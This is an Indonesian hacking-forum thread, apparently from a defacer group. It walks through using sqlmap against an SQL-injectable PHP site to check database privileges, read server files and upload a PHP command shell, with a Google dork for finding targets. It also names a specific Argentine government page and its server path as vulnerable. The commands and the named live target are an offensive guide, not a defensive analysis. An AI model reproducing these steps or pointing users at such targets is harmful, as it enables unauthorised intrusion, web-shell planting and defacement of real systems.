Akses Sistem File di Webserver menggunakan Sqlmap ( Remote File Write) - Kendari Hacker Team

Assalamualaikum Selamat siang. Sahabat Sahabatku dimanapun Anda Berada, Kembali Lagi Dengan Ane InjectX.

Kali Ini Ts Membagikan Sebuah Thread Yang Lumayan Menarik Untuk Dicoba
Dork: site:*ar intitle:*Undefined: intext:*Notice “htdocs” ext:php

Akses Sistem File di Webserver menggunakan Sqlmap

Halo semuanya, Pada Thread kali ini, InjectX

akan mengeksploitasi injeksi SQL berbasis kesalahan untuk mengupload shell di server web dan mendapatkan kendali atasnya! Sekarang, bagaimana melakukan ini, alat yang dibutuhkan, semuanya dibahas sedetail mungkin. Jadi, mari kita selami.

Anggap Saja Kalian Sudah Mendapatkan Target Yang Memiliki Kerentanan SQL Injection.

Jadi, mari kita mulai dengan memeriksa user databese yang ada pada web target

Command: sqlmap.py - u https://,sitetarget,com/php?id=12 --privileges

Seperti yang kita lihat bahwa root @ localhost memiliki hak akses FILE.

Seperti yang dapat kita lihat bahwa pengguna saat ini memiliki hak akses FILE sehingga kita dapat menerapkan –file-read untuk membaca file dari server dan –file-write untuk menulis file di server!

MEMBACA FILE YANG ADA DIDALAM SERVER

Mari kita coba membaca file di direktori publik, katakanlah, index.php

Command: sqlmap.py - https://sitetarget,com/php?id=21 --file-read=/xampp/htdocs/index.php --batch

telah berhasil membaca file dari direktori yang dikenal! Kita dapat menerapkan buster direktori untuk menemukan folder dan file lain dan membacanya juga Karena kita memiliki hak istimewa! Sebagai User Root@LocalHost😍

Sekarang, mari kita coba dan unggah file di server web. Untuk melakukan ini kita
menggunakan command:
“–file-write” dan “–file-dest”
Notice: File-dest ( adalah sebagai tujuan destinasi dimana file akan dikirim)

untuk meletakkannya di tujuan yang diinginkan. Untuk mengunggah shell di server, kita akan memilih shell php injeksi perintah sederhana .

Tapi karena ts Mencoba cara ini melalui Windows. Maka Comanndnya sedikit berbeda
Command: sqlmap.py -u https://sitetarget,com/php?id=21 --file-write=/Asus/downloads/x/hampa.php --file-dest=/xampp/htdocs/hampa.php --batch

Jika berhasil Maka File Akan terupload di Directory Tujuan.!

Web pemerintah argentina vuln cara ini:
Website: http://www.cfee.gov.ar/resolucion.php?rs=1556

Path: C:\xampp\htdocs\cfee\resolucion.php

Special Thanks To: Kendari Hacker Team - InjectX - K4tsuy4-Gh05t - MalaikatHati Defacer Sakit Hati